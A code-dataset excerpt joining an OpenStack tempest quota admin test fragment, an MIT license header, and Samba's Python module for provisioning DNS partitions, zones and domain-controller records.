                   'ram': 10240, 'floating_ips': 20, 'fixed_ips': 10,
                   'key_pairs': 200, 'injected_file_path_bytes': 512,
                   'instances': 20, 'security_group_rules': 20,
                   'cores': 2, 'security_groups': 20,
                   'server_groups': 20, 'server_group_members': 20}
        # Update limits for all quota resources
        updated = self.adm_client.update_quota_set(
            self.demo_tenant_id,
            force=True,
            **desired)['quota_set']
        original.pop('id')
        self.addCleanup(self.adm_client.update_quota_set,
                        self.demo_tenant_id, **original)
        for key in desired:
            self.assertIn(key, updated.keys())

    # TODO(afazekas): merge these test cases
    @decorators.idempotent_id('ce9e0815-8091-4abd-8345-7fe5b85faa1d')
    def test_get_updated_quotas(self):
        # Verify that GET shows the updated quota set of project
        project_name = data_utils.rand_name('cpu_quota_project')
        project = identity.identity_utils(self.os_admin).create_project(
            name=project_name, description=project_name + '-desc')
        project_id = project['id']
        self.addCleanup(identity.identity_utils(self.os_admin).delete_project,
                        project_id)
        self.adm_client.update_quota_set(project_id, ram='5120')
        self.assertEqual(
            5120,
            self.adm_client.show_quota_set(project_id)['quota_set']['ram'])
        # Verify that GET shows the updated quota set of user
        user_name = data_utils.rand_name('cpu_quota_user')
        user = identity.identity_utils(self.os_admin).create_user(
            username=user_name, password=data_utils.rand_password(),
            project=project, email=user_name + '@testmail.tm')
        user_id = user['id']
        self.addCleanup(identity.identity_utils(self.os_admin).delete_user,
                        user_id)
        self.adm_client.update_quota_set(project_id,
                                         user_id=user_id,
                                         ram='2048')
        self.assertEqual(
            2048,
            self.adm_client.show_quota_set(
                project_id, user_id=user_id)['quota_set']['ram'])

    @decorators.idempotent_id('389d04f0-3a41-405f-9317-e5f86e3c44f0')
    def test_delete_quota(self):
        # Admin can delete the resource quota set for a project
        project_name = data_utils.rand_name('ram_quota_project')
        project = identity.identity_utils(self.os_admin).create_project(
            name=project_name, description=project_name + '-desc')
        project_id = project['id']
        self.addCleanup(identity.identity_utils(self.os_admin).delete_project,
                        project_id)
        ram_default = self.adm_client.show_quota_set(
            project_id)['quota_set']['ram']
        self.adm_client.update_quota_set(project_id, ram='5120')
        self.adm_client.delete_quota_set(project_id)
        self.assertEqual(
            ram_default,
            self.adm_client.show_quota_set(project_id)['quota_set']['ram'])
class QuotaClassesAdminTestJSON(base.BaseV2ComputeAdminTest):
    """Tests the os-quota-class-sets API to update default quotas."""

    def setUp(self):
        # All test cases in this class need to externally lock on doing
        # anything with default quota values.
        self.useFixture(fixtures.LockFixture('compute_quotas'))
        super(QuotaClassesAdminTestJSON, self).setUp()

    @classmethod
    def resource_setup(cls):
        super(QuotaClassesAdminTestJSON, cls).resource_setup()
        cls.adm_client = cls.os_admin.quota_classes_client

    def _restore_default_quotas(self, original_defaults):
        """Cleanup helper: push the saved defaults back to the API."""
        LOG.debug("restoring quota class defaults")
        self.adm_client.update_quota_class_set('default', **original_defaults)

    # NOTE(sdague): this test is problematic as it changes
    # global state, and possibly needs to be part of a set of
    # tests that get run all by themselves at the end under a
    # 'danger' flag.
    @decorators.idempotent_id('7932ab0f-5136-4075-b201-c0e2338df51a')
    def test_update_default_quotas(self):
        LOG.debug("get the current 'default' quota class values")
        defaults = (self.adm_client.show_quota_class_set('default')
                    ['quota_class_set'])
        self.assertEqual('default', defaults.pop('id'))
        # restore the defaults when the test is done
        self.addCleanup(self._restore_default_quotas, defaults.copy())
        # increment all of the values for updating the default quota class
        for resource, limit in defaults.items():
            # NOTE(sdague): we need to increment a lot, otherwise
            # there is a real chance that we go from -1 (unlimited)
            # to a very small number which causes issues.
            defaults[resource] = limit + 100
        LOG.debug("update limits for the default quota class set")
        response = self.adm_client.update_quota_class_set(
            'default', **defaults)['quota_class_set']
        LOG.debug("assert that the response has all of the changed values")
        self.assertThat(response.items(),
                        matchers.ContainsAll(defaults.items()))
| Juniper/tempest | tempest/api/compute/admin/test_quotas.py | Python | apache-2.0 | 8,672 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Copyright (c) 2012 Vincent Gauthier.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# -------------------------------------------------------------------------------
| ComplexNetTSP/CooperativeNetworking | complex_systems/spatial/__init__.py | Python | mit | 1,304 |
# Unix SMB/CIFS implementation.
# backend code for provisioning DNS for a Samba4 server
#
# Copyright (C) Kai Blin <kai@samba.org> 2011
# Copyright (C) Amitay Isaacs <amitay@gmail.com> 2011
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""DNS-related provisioning"""
import os
import uuid
import shutil
import time
import ldb
from base64 import b64encode
import subprocess
import samba
from samba.tdb_util import tdb_copy
from samba.ndr import ndr_pack, ndr_unpack
from samba import setup_file
from samba.dcerpc import dnsp, misc, security
from samba.dsdb import (
DS_DOMAIN_FUNCTION_2000,
DS_DOMAIN_FUNCTION_2003,
DS_DOMAIN_FUNCTION_2008_R2,
DS_DOMAIN_FUNCTION_2012_R2
)
from samba.descriptor import (
get_domain_descriptor,
get_domain_delete_protected1_descriptor,
get_domain_delete_protected2_descriptor,
get_dns_partition_descriptor,
get_dns_forest_microsoft_dns_descriptor,
get_dns_domain_microsoft_dns_descriptor
)
from samba.provision.common import (
setup_path,
setup_add_ldif,
setup_modify_ldif,
setup_ldb,
FILL_FULL,
FILL_SUBDOMAIN,
FILL_NT4SYNC,
FILL_DRS,
)
def get_domainguid(samdb, domaindn):
    """Return the domain's objectGUID as a string."""
    result = samdb.search(base=domaindn, scope=ldb.SCOPE_BASE,
                          attrs=["objectGUID"])
    return str(ndr_unpack(misc.GUID, result[0]["objectGUID"][0]))
def get_dnsadmins_sid(samdb, domaindn):
    """Return the objectSid of the domain's DnsAdmins group."""
    group_dn = "CN=DnsAdmins,CN=Users,%s" % domaindn
    result = samdb.search(base=group_dn, scope=ldb.SCOPE_BASE,
                          attrs=["objectSid"])
    return ndr_unpack(security.dom_sid, result[0]["objectSid"][0])
class ARecord(dnsp.DnssrvRpcRecord):
    """An IPv4 host (A) record."""

    def __init__(self, ip_addr, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
        super(ARecord, self).__init__()
        self.wType = dnsp.DNS_TYPE_A
        self.data = ip_addr
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
class AAAARecord(dnsp.DnssrvRpcRecord):
    """An IPv6 host (AAAA) record."""

    def __init__(self, ip6_addr, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
        super(AAAARecord, self).__init__()
        self.wType = dnsp.DNS_TYPE_AAAA
        self.data = ip6_addr
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
class CNameRecord(dnsp.DnssrvRpcRecord):
    """A canonical-name (CNAME) alias record."""

    def __init__(self, cname, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
        super(CNameRecord, self).__init__()
        self.wType = dnsp.DNS_TYPE_CNAME
        self.data = cname
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
class NSRecord(dnsp.DnssrvRpcRecord):
    """A name-server (NS) record."""

    def __init__(self, dns_server, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
        super(NSRecord, self).__init__()
        self.wType = dnsp.DNS_TYPE_NS
        self.data = dns_server
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
class SOARecord(dnsp.DnssrvRpcRecord):
    """A start-of-authority (SOA) record for a zone."""

    def __init__(self, mname, rname, serial=1, refresh=900, retry=600,
                 expire=86400, minimum=3600, ttl=3600, rank=dnsp.DNS_RANK_ZONE):
        super(SOARecord, self).__init__()
        payload = dnsp.soa()
        payload.mname = mname
        payload.rname = rname
        payload.serial = serial
        payload.refresh = refresh
        payload.retry = retry
        payload.expire = expire
        payload.minimum = minimum
        self.wType = dnsp.DNS_TYPE_SOA
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
        self.data = payload
class SRVRecord(dnsp.DnssrvRpcRecord):
    """A service locator (SRV) record."""

    def __init__(self, target, port, priority=0, weight=100, serial=1, ttl=900,
                 rank=dnsp.DNS_RANK_ZONE):
        super(SRVRecord, self).__init__()
        payload = dnsp.srv()
        payload.nameTarget = target
        payload.wPort = port
        payload.wPriority = priority
        payload.wWeight = weight
        self.wType = dnsp.DNS_TYPE_SRV
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
        self.data = payload
class TXTRecord(dnsp.DnssrvRpcRecord):
    """A text (TXT) record carrying a list of strings."""

    def __init__(self, slist, serial=1, ttl=900, rank=dnsp.DNS_RANK_ZONE):
        super(TXTRecord, self).__init__()
        payload = dnsp.string_list()
        payload.count = len(slist)
        payload.str = slist
        self.wType = dnsp.DNS_TYPE_TXT
        self.rank = rank
        self.dwSerial = serial
        self.dwTtlSeconds = ttl
        self.data = payload
class TypeProperty(dnsp.DnsProperty):
    """dnsProperty blob selecting the zone type (defaults to primary)."""

    def __init__(self, zone_type=dnsp.DNS_ZONE_TYPE_PRIMARY):
        super(TypeProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_TYPE
        self.version = 1
        self.wDataLength = 1
        self.data = zone_type
class AllowUpdateProperty(dnsp.DnsProperty):
    """dnsProperty blob controlling dynamic updates (default: secure only)."""

    def __init__(self, allow_update=dnsp.DNS_ZONE_UPDATE_SECURE):
        super(AllowUpdateProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_ALLOW_UPDATE
        self.version = 1
        self.wDataLength = 1
        self.data = allow_update
class SecureTimeProperty(dnsp.DnsProperty):
    """dnsProperty blob holding the zone's secure time value."""

    def __init__(self, secure_time=0):
        super(SecureTimeProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_SECURE_TIME
        self.version = 1
        self.wDataLength = 1
        self.data = secure_time
class NorefreshIntervalProperty(dnsp.DnsProperty):
    """dnsProperty blob holding the zone's no-refresh interval."""

    def __init__(self, norefresh_interval=0):
        super(NorefreshIntervalProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_NOREFRESH_INTERVAL
        self.version = 1
        self.wDataLength = 1
        self.data = norefresh_interval
class RefreshIntervalProperty(dnsp.DnsProperty):
    """dnsProperty blob holding the zone's refresh interval."""

    def __init__(self, refresh_interval=0):
        super(RefreshIntervalProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_REFRESH_INTERVAL
        self.version = 1
        self.wDataLength = 1
        self.data = refresh_interval
class AgingStateProperty(dnsp.DnsProperty):
    """dnsProperty blob enabling/disabling record aging (default: off)."""

    def __init__(self, aging_enabled=0):
        super(AgingStateProperty, self).__init__()
        self.id = dnsp.DSPROPERTY_ZONE_AGING_STATE
        self.version = 1
        self.wDataLength = 1
        self.data = aging_enabled
class AgingEnabledTimeProperty(dnsp.DnsProperty):
    """dnsProperty blob for the aging-enabled time value.

    :param next_cycle_hours: hour value stored in the property (default 0)
    """

    def __init__(self, next_cycle_hours=0):
        super(AgingEnabledTimeProperty, self).__init__()
        self.wDataLength = 1
        # Dropped the stray trailing semicolon the original line carried.
        self.version = 1
        self.id = dnsp.DSPROPERTY_ZONE_AGING_ENABLED_TIME
        self.data = next_cycle_hours
def setup_dns_partitions(samdb, domainsid, domaindn, forestdn, configdn,
                         serverdn, fill_level):
    """Create the DNS application partitions and their base objects.

    Adds the DomainDnsZones partition, and — unless provisioning a
    subdomain (FILL_SUBDOMAIN), which re-uses the forest root's partition —
    the ForestDnsZones partition as well.

    :param samdb: SamDB connection to provision into
    :param domainsid: security.dom_sid of the domain
    :param domaindn: DN of the domain
    :param forestdn: DN of the forest root domain
    :param configdn: DN of the configuration partition
    :param serverdn: DN of this DC's server object
    :param fill_level: one of the FILL_* constants; FILL_SUBDOMAIN skips
        the forest-wide partition
    """
    domainzone_dn = "DC=DomainDnsZones,%s" % domaindn
    forestzone_dn = "DC=ForestDnsZones,%s" % forestdn
    descriptor = get_dns_partition_descriptor(domainsid)
    setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), {
        "ZONE_DN": domainzone_dn,
        "SECDESC" : b64encode(descriptor)
        })
    if fill_level != FILL_SUBDOMAIN:
        setup_add_ldif(samdb, setup_path("provision_dnszones_partitions.ldif"), {
            "ZONE_DN": forestzone_dn,
            "SECDESC" : b64encode(descriptor)
            })
    # A fresh GUID is generated for each zone.  (The previous code first
    # fetched the partition's objectGUID via get_domainguid() and then
    # immediately overwrote the result, so that dead LDAP lookup has been
    # removed.)
    domainzone_guid = str(uuid.uuid4())
    domainzone_dns = ldb.Dn(samdb, domainzone_dn).canonical_ex_str().strip()
    protected1_desc = get_domain_delete_protected1_descriptor(domainsid)
    protected2_desc = get_domain_delete_protected2_descriptor(domainsid)
    setup_add_ldif(samdb, setup_path("provision_dnszones_add.ldif"), {
        "ZONE_DN": domainzone_dn,
        "ZONE_GUID": domainzone_guid,
        "ZONE_DNS": domainzone_dns,
        "CONFIGDN": configdn,
        "SERVERDN": serverdn,
        "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc),
        "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc),
        })
    setup_modify_ldif(samdb, setup_path("provision_dnszones_modify.ldif"), {
        "CONFIGDN": configdn,
        "SERVERDN": serverdn,
        "ZONE_DN": domainzone_dn,
    })
    if fill_level != FILL_SUBDOMAIN:
        forestzone_guid = str(uuid.uuid4())
        forestzone_dns = ldb.Dn(samdb, forestzone_dn).canonical_ex_str().strip()
        setup_add_ldif(samdb, setup_path("provision_dnszones_add.ldif"), {
            "ZONE_DN": forestzone_dn,
            "ZONE_GUID": forestzone_guid,
            "ZONE_DNS": forestzone_dns,
            "CONFIGDN": configdn,
            "SERVERDN": serverdn,
            "LOSTANDFOUND_DESCRIPTOR": b64encode(protected2_desc),
            "INFRASTRUCTURE_DESCRIPTOR": b64encode(protected1_desc),
        })
        setup_modify_ldif(samdb, setup_path("provision_dnszones_modify.ldif"), {
            "CONFIGDN": configdn,
            "SERVERDN": serverdn,
            "ZONE_DN": forestzone_dn,
        })
def add_dns_accounts(samdb, domaindn):
    """Create the DNS-related accounts/groups from the setup LDIF."""
    substitutions = {"DOMAINDN": domaindn}
    setup_add_ldif(samdb, setup_path("provision_dns_accounts_add.ldif"),
                   substitutions)
def add_dns_container(samdb, domaindn, prefix, domain_sid, dnsadmins_sid,
                      forest=False):
    """Create the CN=MicrosoftDNS container under a DNS partition.

    :param samdb: SamDB connection
    :param domaindn: DN the container is created beneath
    :param prefix: partition prefix (e.g. "DC=DomainDnsZones")
    :param domain_sid: security.dom_sid of the domain
    :param dnsadmins_sid: SID substituted for DnsAdmins in the descriptor
    :param forest: choose the forest-wide descriptor instead of the
        domain-wide one
    """
    name_map = {'DnsAdmins': str(dnsadmins_sid)}
    # Idiomatic truth test (was "if forest is True:"); callers pass a bool.
    if forest:
        sd_val = get_dns_forest_microsoft_dns_descriptor(domain_sid,
                                                         name_map=name_map)
    else:
        sd_val = get_dns_domain_microsoft_dns_descriptor(domain_sid,
                                                         name_map=name_map)
    # CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
    msg = ldb.Message(ldb.Dn(samdb, "CN=MicrosoftDNS,%s,%s" % (prefix, domaindn)))
    msg["objectClass"] = ["top", "container"]
    msg["nTSecurityDescriptor"] = ldb.MessageElement(sd_val, ldb.FLAG_MOD_ADD,
                                                     "nTSecurityDescriptor")
    samdb.add(msg)
def add_rootservers(samdb, domaindn, prefix):
    """Create DC=RootDNSServers and populate it with the root hints."""
    # https://www.internic.net/zones/named.root
    rootservers = {
        "a.root-servers.net": "198.41.0.4",
        "b.root-servers.net": "192.228.79.201",
        "c.root-servers.net": "192.33.4.12",
        "d.root-servers.net": "199.7.91.13",
        "e.root-servers.net": "192.203.230.10",
        "f.root-servers.net": "192.5.5.241",
        "g.root-servers.net": "192.112.36.4",
        "h.root-servers.net": "198.97.190.53",
        "i.root-servers.net": "192.36.148.17",
        "j.root-servers.net": "192.58.128.30",
        "k.root-servers.net": "193.0.14.129",
        "l.root-servers.net": "199.7.83.42",
        "m.root-servers.net": "202.12.27.33",
    }
    rootservers_v6 = {
        "a.root-servers.net": "2001:503:ba3e::2:30",
        "b.root-servers.net": "2001:500:84::b",
        "c.root-servers.net": "2001:500:2::c",
        "d.root-servers.net": "2001:500:2d::d",
        "e.root-servers.net": "2001:500:a8::e",
        "f.root-servers.net": "2001:500:2f::f",
        "g.root-servers.net": "2001:500:12::d0d",
        "h.root-servers.net": "2001:500:1::53",
        "i.root-servers.net": "2001:7fe::53",
        "j.root-servers.net": "2001:503:c27::2:30",
        "k.root-servers.net": "2001:7fd::1",
        "l.root-servers.net": "2001:500:9f::42",
        "m.root-servers.net": "2001:dc3::35",
    }
    container_dn = "DC=RootDNSServers,CN=MicrosoftDNS,%s,%s" % (prefix, domaindn)
    # Add DC=RootDNSServers,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN> as a
    # cache-type zone with dynamic updates switched off.
    zone_props = [
        ndr_pack(TypeProperty(zone_type=dnsp.DNS_ZONE_TYPE_CACHE)),
        ndr_pack(AllowUpdateProperty(allow_update=dnsp.DNS_ZONE_UPDATE_OFF)),
        ndr_pack(SecureTimeProperty()),
        ndr_pack(NorefreshIntervalProperty()),
        ndr_pack(RefreshIntervalProperty()),
        ndr_pack(AgingStateProperty()),
        ndr_pack(AgingEnabledTimeProperty()),
    ]
    msg = ldb.Message(ldb.Dn(samdb, container_dn))
    msg["objectClass"] = ["top", "dnsZone"]
    msg["cn"] = ldb.MessageElement("Zone", ldb.FLAG_MOD_ADD, "cn")
    msg["dNSProperty"] = ldb.MessageElement(zone_props, ldb.FLAG_MOD_ADD,
                                            "dNSProperty")
    samdb.add(msg)
    # Add DC=@,DC=RootDNSServers,...: one NS root-hint record per server.
    ns_records = [ndr_pack(NSRecord(name, serial=0, ttl=0,
                                    rank=dnsp.DNS_RANK_ROOT_HINT))
                  for name in rootservers]
    msg = ldb.Message(ldb.Dn(samdb, "DC=@,%s" % container_dn))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(ns_records, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
    # Add DC=<rootserver>,DC=RootDNSServers,...: the glue A record for each.
    for name, ipv4 in rootservers.items():
        record = [ndr_pack(ARecord(ipv4, serial=0, ttl=0,
                                   rank=dnsp.DNS_RANK_ROOT_HINT))]
        # Add AAAA record as well (How does W2K* add IPv6 records?)
        #if name in rootservers_v6:
        #    record.append(ndr_pack(AAAARecord(rootservers_v6[name],
        #                                      serial=0, ttl=0)))
        msg = ldb.Message(ldb.Dn(samdb, "DC=%s,%s" % (name, container_dn)))
        msg["objectClass"] = ["top", "dnsNode"]
        msg["dnsRecord"] = ldb.MessageElement(record, ldb.FLAG_MOD_ADD,
                                              "dnsRecord")
        samdb.add(msg)
def add_at_record(samdb, container_dn, prefix, hostname, dnsdomain, hostip, hostip6):
    """Add the zone apex (DC=@) node: SOA + NS plus optional A/AAAA."""
    fqdn_hostname = "%s.%s" % (hostname, dnsdomain)
    records = [
        # SOA record
        ndr_pack(SOARecord(fqdn_hostname, "hostmaster.%s" % dnsdomain)),
        # NS record
        ndr_pack(NSRecord(fqdn_hostname)),
    ]
    if hostip is not None:
        # A record
        records.append(ndr_pack(ARecord(hostip)))
    if hostip6 is not None:
        # AAAA record
        records.append(ndr_pack(AAAARecord(hostip6)))
    msg = ldb.Message(ldb.Dn(samdb, "DC=@,%s" % container_dn))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(records, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_srv_record(samdb, container_dn, prefix, host, port):
    """Add a dnsNode holding one SRV record under container_dn."""
    packed = ndr_pack(SRVRecord(host, port))
    msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(packed, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_ns_record(samdb, container_dn, prefix, host):
    """Add a dnsNode holding one zone-rank NS record under container_dn."""
    packed = ndr_pack(NSRecord(host))
    msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(packed, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_ns_glue_record(samdb, container_dn, prefix, host):
    """Add a dnsNode holding one glue-rank NS record under container_dn."""
    packed = ndr_pack(NSRecord(host, rank=dnsp.DNS_RANK_NS_GLUE))
    msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(packed, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_cname_record(samdb, container_dn, prefix, host):
    """Add a dnsNode holding one CNAME record under container_dn."""
    packed = ndr_pack(CNameRecord(host))
    msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(packed, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_host_record(samdb, container_dn, prefix, hostip, hostip6):
    """Add a dnsNode with A and/or AAAA records; no-op without addresses."""
    records = []
    if hostip:
        records.append(ndr_pack(ARecord(hostip)))
    if hostip6:
        records.append(ndr_pack(AAAARecord(hostip6)))
    if not records:
        return
    msg = ldb.Message(ldb.Dn(samdb, "%s,%s" % (prefix, container_dn)))
    msg["objectClass"] = ["top", "dnsNode"]
    msg["dnsRecord"] = ldb.MessageElement(records, ldb.FLAG_MOD_ADD,
                                          "dnsRecord")
    samdb.add(msg)
def add_domain_record(samdb, domaindn, prefix, dnsdomain, domainsid,
                      dnsadmins_sid):
    """Create the dnsZone object for the domain's own DNS zone.

    :param samdb: SamDB connection
    :param domaindn: DN of the domain
    :param prefix: partition prefix (e.g. "DC=DomainDnsZones")
    :param dnsdomain: DNS domain name of the zone
    :param domainsid: security.dom_sid used to resolve SDDL abbreviations
    :param dnsadmins_sid: SID of DnsAdmins, substituted into the SDDL
    """
    # DC=<DNSDOMAIN>,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
    sddl = "O:SYG:BAD:AI" \
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)" \
    "(A;;CC;;;AU)" \
    "(A;;RPLCLORC;;;WD)" \
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;SY)" \
    "(A;CI;RPWPCRCCDCLCRCWOWDSDDTSW;;;ED)" \
    "(A;CIID;RPWPCRCCDCLCRCWOWDSDDTSW;;;%s)" \
    "(A;CIID;RPWPCRCCDCLCRCWOWDSDDTSW;;;ED)" \
    "(OA;CIID;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)" \
    "(A;CIID;RPWPCRCCDCLCLORCWOWDSDDTSW;;;EA)" \
    "(A;CIID;LC;;;RU)" \
    "(A;CIID;RPWPCRCCLCLORCWOWDSDSW;;;BA)" \
    "S:AI" % dnsadmins_sid
    sec = security.descriptor.from_sddl(sddl, domainsid)
    props = [
        ndr_pack(TypeProperty()),
        ndr_pack(AllowUpdateProperty()),
        ndr_pack(SecureTimeProperty()),
        ndr_pack(NorefreshIntervalProperty(norefresh_interval=168)),
        ndr_pack(RefreshIntervalProperty(refresh_interval=168)),
        ndr_pack(AgingStateProperty()),
        ndr_pack(AgingEnabledTimeProperty()),
    ]
    msg = ldb.Message(ldb.Dn(samdb, "DC=%s,CN=MicrosoftDNS,%s,%s" % (dnsdomain, prefix, domaindn)))
    msg["objectClass"] = ["top", "dnsZone"]
    # Consistency fix: use the same "nTSecurityDescriptor" key spelling as
    # add_dns_container() (LDAP attribute names are case-insensitive, but
    # the file should spell it one way).
    msg["nTSecurityDescriptor"] = ldb.MessageElement(ndr_pack(sec),
                                                     ldb.FLAG_MOD_ADD,
                                                     "nTSecurityDescriptor")
    msg["dNSProperty"] = ldb.MessageElement(props, ldb.FLAG_MOD_ADD,
                                            "dNSProperty")
    samdb.add(msg)
def add_msdcs_record(samdb, forestdn, prefix, dnsforest):
    """Create the (empty) _msdcs.<forest> dnsZone object."""
    # DC=_msdcs.<DNSFOREST>,CN=MicrosoftDNS,<PREFIX>,<FORESTDN>
    zone_dn = "DC=_msdcs.%s,CN=MicrosoftDNS,%s,%s" % (dnsforest, prefix,
                                                      forestdn)
    msg = ldb.Message(ldb.Dn(samdb, zone_dn))
    msg["objectClass"] = ["top", "dnsZone"]
    samdb.add(msg)
def add_dc_domain_records(samdb, domaindn, prefix, site, dnsdomain, hostname,
                          hostip, hostip6):
    """Register this DC's DNS records inside the domain zone container."""
    fqdn_hostname = "%s.%s" % (hostname, dnsdomain)
    # Set up domain container - DC=<DNSDOMAIN>,CN=MicrosoftDNS,<PREFIX>,<DOMAINDN>
    domain_container_dn = ldb.Dn(samdb, "DC=%s,CN=MicrosoftDNS,%s,%s" %
                                 (dnsdomain, prefix, domaindn))
    # Zone apex (DC=@) record and the host's own address node.
    add_at_record(samdb, domain_container_dn, "DC=@", hostname, dnsdomain,
                  hostip, hostip6)
    add_host_record(samdb, domain_container_dn, "DC=%s" % hostname, hostip,
                    hostip6)
    # Kerberos/kpasswd/LDAP/GC service locator records.
    # FIXME: The number of SRV records depend on the various roles this DC has.
    # _gc and _msdcs records are added if the we are the forest dc and not subdomain dc
    #
    # Assumption: current DC is GC and add all the entries
    for srv_prefix, srv_port in [
            ("DC=_kerberos._tcp", 88),
            ("DC=_kerberos._tcp.%s._sites" % site, 88),
            ("DC=_kerberos._udp", 88),
            ("DC=_kpasswd._tcp", 464),
            ("DC=_kpasswd._udp", 464),
            ("DC=_ldap._tcp", 389),
            ("DC=_ldap._tcp.%s._sites" % site, 389),
            ("DC=_gc._tcp", 3268),
            ("DC=_gc._tcp.%s._sites" % site, 3268)]:
        add_srv_record(samdb, domain_container_dn, srv_prefix, fqdn_hostname,
                       srv_port)
    # DC=_msdcs glue record
    add_ns_glue_record(samdb, domain_container_dn, "DC=_msdcs", fqdn_hostname)
    # FIXME: Following entries are added only if DomainDnsZones and ForestDnsZones partitions
    # are created
    #
    # Assumption: Additional entries won't hurt on os_level = 2000
    for srv_prefix in [
            "DC=_ldap._tcp.%s._sites.DomainDnsZones" % site,
            "DC=_ldap._tcp.%s._sites.ForestDnsZones" % site,
            "DC=_ldap._tcp.DomainDnsZones",
            "DC=_ldap._tcp.ForestDnsZones"]:
        add_srv_record(samdb, domain_container_dn, srv_prefix, fqdn_hostname,
                       389)
    # Address nodes for the two DNS application partitions.
    add_host_record(samdb, domain_container_dn, "DC=DomainDnsZones", hostip,
                    hostip6)
    add_host_record(samdb, domain_container_dn, "DC=ForestDnsZones", hostip,
                    hostip6)
def add_dc_msdcs_records(samdb, forestdn, prefix, site, dnsforest, hostname,
                         hostip, hostip6, domainguid, ntdsguid):
    """Register this DC's records inside the forest-wide _msdcs container."""
    fqdn_hostname = "%s.%s" % (hostname, dnsforest)
    # Set up forest container - DC=_msdcs.<DNSFOREST>,CN=MicrosoftDNS,<PREFIX>,<FORESTDN>
    forest_container_dn = ldb.Dn(samdb, "DC=_msdcs.%s,CN=MicrosoftDNS,%s,%s" %
                                 (dnsforest, prefix, forestdn))
    # Zone apex (DC=@): SOA and NS only, no address records.
    add_at_record(samdb, forest_container_dn, "DC=@", hostname, dnsforest,
                  None, None)
    # DC, GC and PDC locator SRV records.
    for srv_prefix, srv_port in [
            ("DC=_kerberos._tcp.dc", 88),
            ("DC=_kerberos._tcp.%s._sites.dc" % site, 88),
            ("DC=_ldap._tcp.dc", 389),
            ("DC=_ldap._tcp.%s._sites.dc" % site, 389),
            ("DC=_ldap._tcp.%s._sites.gc" % site, 3268),
            ("DC=_ldap._tcp.gc", 3268),
            ("DC=_ldap._tcp.pdc", 389)]:
        add_srv_record(samdb, forest_container_dn, srv_prefix, fqdn_hostname,
                       srv_port)
    # DC=gc address records.
    add_host_record(samdb, forest_container_dn, "DC=gc", hostip, hostip6)
    # Domain-GUID-based locator record.
    add_srv_record(samdb, forest_container_dn,
                   "DC=_ldap._tcp.%s.domains" % domainguid, fqdn_hostname,
                   389)
